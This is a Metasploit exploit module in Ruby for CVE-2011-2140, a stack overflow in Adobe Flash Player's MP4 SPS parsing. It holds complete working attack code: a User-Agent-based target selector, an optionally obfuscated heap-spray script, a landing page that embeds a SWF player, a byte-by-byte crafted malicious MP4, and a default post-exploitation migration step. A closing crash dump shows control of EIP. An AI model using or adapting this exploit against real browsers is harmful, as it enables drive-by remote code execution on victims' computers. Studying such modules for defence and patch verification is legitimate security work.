##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Exploit::Remote
Rank = NormalRanking
include Msf::Exploit::Remote::HttpServer::HTML
# Module metadata (name, references, payload constraints, targets) plus the
# single module-specific option, OBFUSCATE.
#
# @param info [Hash] framework-supplied info merged via update_info
def initialize(info = {})
  authors = [
    'Alexander Gavrun', # RCA
    'Unknown', # Abysssec, proof of concept
    'sinn3r' # Metasploit
  ]

  references = [
    [ 'CVE', '2011-2140' ],
    [ 'OSVDB', '74439'],
    [ 'BID', '49083' ],
    [ 'ZDI', '11-276' ],
    [ 'URL', 'http://www.kahusecurity.com/2011/cve-2011-2140-caught-in-the-wild/' ],
    [ 'URL', 'http://www.adobe.com/support/security/bulletins/apsb11-21.html' ],
    [ 'URL', 'http://web.archive.org/web/20170111122134/http://0x1byte.blogspot.com:80/2011/11/analysis-of-cve-2011-2140-adobe-flash.html' ]
  ]

  # 'Offset' is read by on_request_uri when it builds the spray script; the
  # 'Automatic' entry carries none because get_target maps it to one of the
  # concrete entries from the User-Agent header.
  target_table = [
    [ 'Automatic', {} ],
    [ 'IE 6 on Windows XP SP3', { 'Offset' => '0x600' } ], # 0x5f4 = spot on
    [ 'IE 7 on Windows XP SP3 / Vista', { 'Offset' => '0x600' } ]
  ]

  super(
    update_info(
      info,
      'Name' => "Adobe Flash Player MP4 SequenceParameterSetNALUnit Buffer Overflow",
      'Description' => %q{
This module exploits a vulnerability found in Adobe Flash Player's Flash10u.ocx
component. When processing a MP4 file (specifically the Sequence Parameter Set),
Flash will see if pic_order_cnt_type is equal to 1, which sets the
num_ref_frames_in_pic_order_cnt_cycle field, and then blindly copies data in
offset_for_ref_frame on the stack, which allows arbitrary remote code execution
under the context of the user. Numerous reports also indicate that this
vulnerability has been exploited in the wild.
},
      'License' => MSF_LICENSE,
      'Author' => authors,
      'References' => references,
      'Payload' => {
        'BadChars' => "\x00",
        'StackAdjustment' => -3500
      },
      'DefaultOptions' => {
        'EXITFUNC' => "seh",
        'InitialAutoRunScript' => 'post/windows/manage/priv_migrate'
      },
      'Platform' => 'win',
      'Targets' => target_table,
      'Privileged' => false,
      'DisclosureDate' => '2011-08-09',
      'DefaultTarget' => 0,
      'Notes' => {
        'Reliability' => UNKNOWN_RELIABILITY,
        'Stability' => UNKNOWN_STABILITY,
        'SideEffects' => UNKNOWN_SIDE_EFFECTS
      }
    )
  )

  register_options([
    OptBool.new('OBFUSCATE', [false, 'Enable JavaScript obfuscation'])
  ])
end
# Resolves the target to use for one request.
#
# @param agent [String, nil] the request's User-Agent header
# @return [Msf::Module::Target, nil] the operator-selected target when one was
#   chosen explicitly, otherwise the entry matched from the User-Agent, or nil
#   when nothing matches (on_request_uri answers such requests with a 404)
def get_target(agent)
  # An explicit selection by the operator always wins over UA sniffing.
  return target unless target.name == 'Automatic'

  ie6_on_xp = (agent =~ /NT 5\.1/) && (agent =~ /MSIE 6/)
  if ie6_on_xp
    targets[1]
  elsif agent =~ /MSIE 7/
    targets[2]
  end
end
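# HTTP handler for every request that reaches this module's resource.
#
# Dispatch order:
#   * unsupported User-Agent        -> 404, nothing else is sent
#   * URI ending in .mp4            -> the MP4 built by create_mp4 (@mp4)
#   * URI ending in .swf            -> the SWF player loaded by create_swf (@swf)
#   * resource without "/" suffix   -> redirect so the relative SWF path resolves
#   * anything else                 -> landing page with the spray script
#
# @param cli the client connection handed in by the HTTP server mixin
# @param request the parsed request; only headers['User-Agent'] and uri are read
# @return [void]
def on_request_uri(cli, request)
  agent = request.headers['User-Agent']
  my_target = get_target(agent)

  # No matching target: answer 404 rather than send a spray tuned for a
  # different browser, which would only crash the client.
  if my_target.nil?
    print_error("Browser not supported: #{agent}")
    send_not_found(cli)
    return
  end

  # The SWF player fetches the media file it was pointed at.
  if request.uri.end_with?('.mp4')
    print_status("Sending MP4")
    send_response(cli, @mp4, { 'Content-Type' => 'video/mp4' })
    return
  end

  # The SWF player itself, referenced relatively from the landing page.
  if request.uri.end_with?('.swf')
    print_status("Sending SWF")
    send_response(cli, @swf, { 'Content-Type' => 'application/x-shockwave-flash' })
    return
  end

  # Redirect to a trailing slash so the relative SWF path in the landing
  # page resolves under our resource.
  if get_resource != "/" && !request.uri.index("#{get_resource}/")
    send_redirect(cli, get_resource + "/")
    return
  end

  js = spray_js(my_target)
  if datastore['OBFUSCATE']
    # After this, js is a JSObfu instance; its to_s is what gets interpolated.
    js = ::Rex::Exploitation::JSObfu.new(js)
    js.obfuscate(memory_sensitive: true)
  end

  print_status("Sending HTML")
  send_response(cli, landing_html(js, player_uri), { 'Content-Type' => 'text/html' })
end

# Builds the spray script for +my_target+ from the encoded payload and wraps
# it with heaplib(); obfuscation, when enabled, is applied by the caller.
#
# @param my_target [Msf::Module::Target] resolved target; only its 'Offset'
#   entry is read here and it is used verbatim as a JS substring length
# @return [String] JavaScript source
private def spray_js(my_target)
  # Endianness comes from the datastore-selected target, not from my_target,
  # exactly as the original code did.
  endian = Rex::Arch.endian(target.arch)
  js_code = Rex::Text.to_unescape(payload.encoded, endian)
  js_nops = Rex::Text.to_unescape("\x0c" * 4, endian)
  # Randomly named holder for the nop bytes.
  randnop = rand_text_alpha(rand(100) + 1)

  js = <<~JS
    var heap_obj = new heapLib.ie(0x20000);
    var code = unescape("#{js_code}");
    var #{randnop} = "#{js_nops}";
    var nops = unescape(#{randnop});

    while (nops.length < 0x80000) nops += nops;
    var offset = nops.substring(0, #{my_target['Offset']});
    var shellcode = offset + code + nops.substring(0, 0x800-code.length-offset.length);

    while (shellcode.length < 0x40000) shellcode += shellcode;
    var block = shellcode.substring(0, (0x7ffc0-6)/2);

    heap_obj.gc();

    for (var i=1; i < 0x300; i++) {
      heap_obj.alloc(block);
    }
  JS

  heaplib(js, { :noobfu => true })
end

# Relative URL of the SWF player, with the absolute URL of our MP4 in its
# query string. A wildcard SRVHOST (0.0.0.0) is replaced by the local address
# used to reach 50.50.50.50, since the client needs an address it can connect to.
# NOTE(review): only the IPv4 wildcard is special-cased and the scheme is fixed
# to http; confirm behaviour when SRVHOST is '::' or SSL is enabled.
#
# @return [String]
private def player_uri
  myhost = datastore['SRVHOST'] == '0.0.0.0' ? Rex::Socket.source_address('50.50.50.50') : datastore['SRVHOST']
  mp4_uri = "http://#{myhost}:#{datastore['SRVPORT']}#{get_resource}/#{rand_text_alpha(rand(6) + 3)}.mp4"
  "#{Rex::Text.rand_text_alphanumeric(rand(8) + 4)}.swf?autostart=true&image=video.jpg&file=#{mp4_uri}"
end

# Landing page: the inline spray script plus a 1x1 Flash object pointing at
# the SWF player, which in turn fetches the MP4.
#
# @param js [#to_s] spray script (String, or a JSObfu instance when OBFUSCATE is set)
# @param swf_uri [String] relative SWF URL carrying the MP4 location in its query
# @return [String] HTML document
private def landing_html(js, swf_uri)
  <<~HTML
    <html>
    <head>
    <script>
    #{js}
    </script>
    </head>
    <body>
    <object width="1" height="1" type="application/x-shockwave-flash" data="#{swf_uri}">
    <param name="movie" value="#{swf_uri}">
    </object>
    </body>
    </html>
  HTML
end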
# Builds both served artifacts once, up front, so every request handled by
# on_request_uri returns the same bytes, then defers to super to start serving.
def exploit
  @mp4, @swf = create_mp4, create_swf
  super
end
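# Loads the bundled SWF player that on_request_uri serves for .swf requests.
#
# @param path [String] location of the SWF; defaults to mp4player.swf under
#   the framework data directory. The default is evaluated at call time, so
#   the existing no-argument call behaves exactly as before.
# @return [String] the raw SWF bytes, binary (ASCII-8BIT) encoded
# @raise [SystemCallError] if the file cannot be opened or read
def create_swf(path = ::File.join(Msf::Config.data_directory, "exploits", "mp4player.swf"))
  # binread opens in "rb" and always closes the handle, even when the read
  # raises; the explicit open/read/close it replaces leaked the descriptor
  # on error.
  ::File.binread(path)
end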
# Assembles the MP4 that the SWF player fetches; this is the file that reaches
# the SPS parser described in the module info.
#
# Layout: ftyp, a tiny mdat, then a moov whose avcC carries one SPS NAL unit.
# The SPS ends with +cycle+ repeated 35 times - presumably the oversized
# offset_for_ref_frame data named in the description (the crash notes at the
# end of the file show 0x0c0c0c0c in the registers). The remaining atoms look
# like scaffolding needed to get the parser that far; not verified here.
#
# Every size field is a hard-coded literal and nothing is recomputed, so any
# change to a literal has to be mirrored in the enclosing size fields by hand.
# Several size fields are also split across literals (the 'l' in "lmvhd",
# the 'r' in "rmdia" and the 'p' in "pctts" appear to be the low byte of the
# preceding size) - confirm with an MP4 parser before touching them.
#
# @return [String] the complete MP4 bytes
def create_mp4
  ftypAtom = "\x00\x00\x00\x20" # Size
  ftypAtom << "ftypisom"
  ftypAtom << "\x00\x00\x02\x00"
  ftypAtom << "isomiso2avc1mp41"

  mdatAtom = "\x00\x00\x00\x10" # Size
  mdatAtom << "mdat"
  mdatAtom << "\x00\x00\x02\x8B\x06\x05\xFF\xFF"

  moovAtom1 = "\x00\x00\x08\x83" # Size
  moovAtom1 << "moov" # Move header box header
  moovAtom1 << "\x00\x00\x00"
  moovAtom1 << "lmvhd" # Type
  moovAtom1 << "\x00\x00\x00\x00" # Version/Flags
  moovAtom1 << "\x7C\x25\xB0\x80\x7C\x25\xB0\x80" # Creation time
  moovAtom1 << "\x00\x00\x03\xE8" # Time scale
  moovAtom1 << "\x00\x00\x2F\x80" # Duration
  moovAtom1 << "\x00\x01\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
  moovAtom1 << "\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x40\x00\x00\x00\x00\x00\x00\x00"
  moovAtom1 << "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x03\x00\x00\x02\xFA"
  moovAtom1 << "trak" # Track box header
  moovAtom1 << "\x00\x00\x00\x5C"
  moovAtom1 << "tkhd"
  moovAtom1 << "\x00\x00\x00\x0F"
  moovAtom1 << "\x7C\x25\xB0\x80\x7C\x25\xB0\x80" # Creation time
  moovAtom1 << "\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x2E\xE0\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
  moovAtom1 << "\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
  moovAtom1 << "\x00\x00\x00\x00\x40\x00\x00\x00\x01\x42\x00\x00\x01\x42\x00\x00\x00\x00\x02"
  moovAtom1 << "rmdia"
  moovAtom1 << "\x00\x00\x00\x20" # Size
  moovAtom1 << "mdhd" # Media header box
  moovAtom1 << "\x00\x00\x00\x00" # Version/Flags
  moovAtom1 << "\x7C\x25\xB0\x80\x7C\x25\xB0\x80" # Creation time
  moovAtom1 << "\x00\x00\x00\x01" # Time scale
  moovAtom1 << "\x00\x00\x00\x0C" # Duration
  moovAtom1 << "\x55\xC4\x00\x00"
  moovAtom1 << "\x00\x00\x00\x2D" # Size
  moovAtom1 << "hdlr" # Handler Reference header
  moovAtom1 << "\x00\x00\x00\x00\x00\x00\x00\x00"
  moovAtom1 << "vide" # Handler type
  moovAtom1 << "\x00\x00\x00\x00\x00"
  moovAtom1 << "\x00\x00\x00\x00\x00\x00\x00"
  moovAtom1 << "VideoHandler" # Handler name
  moovAtom1 << "\x00\x00\x00\x02\x1D"
  moovAtom1 << "minf"
  moovAtom1 << "\x00\x00\x00\x14"
  moovAtom1 << "vmhd"
  moovAtom1 << "\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x24"
  moovAtom1 << "dinf" # Data information box header
  moovAtom1 << "\x00\x00\x00\x1c"
  moovAtom1 << "dref" # Data reference box
  moovAtom1 << "\x00\x00\x00\x00\x00\x00\x00\x01"
  moovAtom1 << "\x00\x00\x00\x0C" # Size
  moovAtom1 << "url " # Data entry URL box
  moovAtom1 << "\x00\x00\x00\x01" # Location / version / flags
  moovAtom1 << "\x00\x00\x09\xDD" # Size
  moovAtom1 << "stbl"
  moovAtom1 << "\x00\x00\x08\x99"
  moovAtom1 << "stsd"
  moovAtom1 << "\x00\x00\x00\x00\x00\x00\x00\x01"
  moovAtom1 << "\x00\x00\x08\x89" # Size
  moovAtom1 << "avc1"
  moovAtom1 << "\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
  moovAtom1 << "\x01\x42" # Width
  moovAtom1 << "\x01\x42" # Height
  moovAtom1 << "\x00\x48\x00\x00\x00\x48\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
  moovAtom1 << "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
  moovAtom1 << "\x18" # Depth
  moovAtom1 << "\xFF\xFF"
  moovAtom1 << "\x00\x00\x08\x33" # Size
  moovAtom1 << "avcC"
  moovAtom1 << "\x01" # Config version
  moovAtom1 << "\x64" # Avc profile indication
  moovAtom1 << "\x00" # Compatibility
  moovAtom1 << "\x15" # Avc level indication
  moovAtom1 << "\xFF\xE1" # NOTE(review): presumably the SPS count prefix (one SPS follows) - confirm against avcC layout

  # Although the fields have different values, they all become 0x0c0c0c0c
  # in memory.
  cycle = "\x00\x00\x00"
  cycle << "\x30\x30\x30\x30" # 6th
  cycle << "\x00\x00\x00"
  cycle << "\x18\x18\x18\x18" # 7th
  cycle << "\x00\x00\x00"
  cycle << "\x0c\x0c\x0c\x0c" # 8th
  cycle << "\x00\x00\x00"
  cycle << "\x06\x06\x06\x06" # 1st
  cycle << "\x00\x00\x00"
  cycle << "\x03\x03\x03\x03"
  cycle << "\x00\x00\x00\x01\x81\x81\x81\x80\x00\x00\x00"
  cycle << "\xc0\xc0\xc0\xc0" # 4th
  cycle << "\x00\x00\x00"
  cycle << "\x60\x60\x60\x60"

  # SPS NAL unit: fixed prefix, a run of 0xFF, then the repeated cycle and a
  # short trailer. The repeat count (35) is part of the trigger; changing it
  # also changes the hard-coded sizes above.
  spsunit = "\x08\x1A\x67\x70\x34\x32\x74\x70\x00\x00\xAF\x88\x88\x84\x00\x00\x03\x00\x04\x00\x00\x03\x00\x3F\xFF\xFF\xFF\xFF\xFF"
  spsunit << "\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF"
  spsunit << "\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFC"
  spsunit << cycle * 35
  spsunit << "\x00\x00\x00\x30\x30\x03\x03\x03\x03\x00\x00\x00\xB2\x2C"

  # Sample tables (stts/stss/ctts/stsc/stsz/stco) closing the moov.
  moovAtom2 = "\x00\x00\x00\x18"
  moovAtom2 << "stts"
  moovAtom2 << "\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x0C\x00\x00\x00\x01"
  moovAtom2 << "\x00\x00\x00\x14"
  moovAtom2 << "stss"
  moovAtom2 << "\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x01\x00\x00\x00"
  moovAtom2 << "pctts"
  moovAtom2 << "\x00\x00\x00\x00\x00\x00"
  moovAtom2 << "\x00\x0C\x00\x00\x00\x01\x00\x00\x00\x02\x00\x00\x00\x01\x00\x00\x00\x03\x00\x00\x00\x01\x00\x00\x00\x01\x00\x00\x00"
  moovAtom2 << "\x01\x00\x00\x00\x03\x00\x00\x00\x01\x00\x00\x00\x01\x00\x00\x00\x01\x00\x00\x00\x05\x00\x00\x00\x01\x00\x00\x00\x02"
  moovAtom2 << "\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x01\x00\x00\x00\x01\x00\x00\x00\x03\x00\x00\x00\x01\x00"
  moovAtom2 << "\x00\x00\x01\x00\x00\x00\x01\x00\x00\x00\x02"
  moovAtom2 << "\x00\x00\x00\x1C"
  moovAtom2 << "stsc"
  moovAtom2 << "\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x01\x00\x00\x00\x01\x00\x00\x00\x01"
  moovAtom2 << "\x00\x00\x00\x44"
  moovAtom2 << "stsz"
  moovAtom2 << "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
  moovAtom2 << "\x0C\x00\x00\x2F\x8D\x00\x00\x0C\xFE\x00\x00\x04\x42\x00\x00\x0B\x20\x00\x00\x04\x58\x00\x00\x07\x19\x00\x00\x07"
  moovAtom2 << "\x63\x00\x00\x02\xD6\x00\x00\x03\xC1\x00\x00\x0A\xDF\x00\x00\x04\x9B\x00\x00\x09\x39"
  moovAtom2 << "\x00\x00\x00\x40"
  moovAtom2 << "stco"
  moovAtom2 << "\x00\x00\x00\x00\x00\x00\x00\x0C\x00\x00\x00\x30\x00\x00\x2F\xBD\x00\x00\x3D\x8A\x00\x00\x48\x19\x00\x00\x5A\xF4"
  moovAtom2 << "\x00\x00\x66\x1F\x00\x00\x73\xEA\x00\x00\x82\x32\x00\x00\x8A\xFA\x00\x00\x95\x51\x00\x00\xA7\x16\x00\x00\xB1\xE5"

  moovAtom = moovAtom1 + spsunit + moovAtom2
  m = ftypAtom + mdatAtom + moovAtom
  return m
end
end
=begin
C:\WINDOWS\system32\Macromed\Flash\Flash10u.ocx

Flash10u+0x5b4e8:
Missing image name, possible paged-out or corrupt data.
1f06b4e8 8901 mov dword ptr [ecx],eax ds:0023:020c0000=00905a4d
0:008> !exchain
020bfdfc: <Unloaded_ud.drv>+c0c0c0b (0c0c0c0c)

ECX points to 0x0c0c0c0c at the time of the crash:
0:008> r
eax=00000000 ebx=00000000 ecx=0c0c0c0c edx=7c9032bc esi=00000000 edi=00000000
eip=0c0c0c0c esp=020befa8 ebp=020befc8 iopl=0 nv up ei pl zr na pe nc
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00050246
<Unloaded_ud.drv>+0xc0c0c0b:
0c0c0c0c ?? ???

Example of SWF player URI:
http://www.jeroenwijering.com/embed/mediaplayer.swf

To-do:
IE 8 target
=end